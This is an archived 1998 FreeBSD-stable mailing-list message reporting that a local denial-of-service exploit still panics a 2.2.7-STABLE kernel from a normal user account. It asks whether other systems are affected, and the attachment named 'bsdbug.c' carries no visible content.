Date:      Tue, 11 Aug 1998 00:31:03 -0700 (PDT)
From:      Scott <scott@SchematiX.net>
To:        FreeBSD-stable@FreeBSD.ORG
Subject:   Huge Bug in FreeBSD not fixed?
Message-ID:  <Pine.BSF.4.02.9808110025020.216-200000@SchematiX.net>

--0-1205284948-902820663=:216
Content-Type: TEXT/PLAIN; charset=US-ASCII

I ran across this bug a while back on rootshell, and then again by a user
on IRC who offered to take down my box. Soon after that, the bug was fixed
and things were fine. But just out of boredom, I decided to run the
exploit again. Sure enough, I had a kernel panic and that was it. All of
this from a normal user account. The bug has reoccurred recently and may
cause problems on my server if the users find out about the vulnerability.

I am running FreeBSD 2.2.7-STABLE (Last compiled on August 5th early in
the morning). The system is running on a PII233 with 64MB RAM. This bug
REALLY needs to be fixed ASAP.

I would like to know if other systems are vulnerable as well. I discussed
this matter on IRC and everyone said they had similar problems. This bug
needs to be addressed soon. I would HATE switching to Linux because my
system keeps crashing.


---------------
Scott Swindells, SchematiX.NET

--0-1205284948-902820663=:216
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="bsdbug.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.02.9808110031030.216@SchematiX.net>
Content-Description: 
Content-Disposition: attachment; filename="bsdbug.c"
--0-1205284948-902820663=:216--
